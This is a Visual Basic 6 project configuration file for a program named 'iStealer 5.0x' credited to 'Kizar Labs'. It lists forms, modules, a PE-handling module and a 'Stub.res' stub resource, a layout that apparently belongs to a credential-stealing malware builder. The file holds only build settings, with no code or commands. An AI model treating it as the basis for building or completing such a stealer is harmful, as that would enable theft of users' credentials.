Type=Exe
Form=frmMain.frm
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\WINDOWS\system32\stdole2.tlb#OLE Automation
Module=basRes; basRes.bas
Module=basFun; basFun.bas
Form=frmAbout.frm
Form=frmOptions.frm
Class=cFileDialog; cFileDialog.cls
Module=basPE; basPE.bas
ResFile32="Stub.res"
IconForm="frmMain"
Startup="frmMain"
HelpFile=""
Title="iStealer"
ExeName32="iStealer 5.0x.exe"
Command32=""
Name="iS_5_0_MOD"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=1
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="Kizar Labs"
VersionProductName="iStealer"
CompilationType=-1
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=0

[MS Transaction Server]
AutoRefresh=1
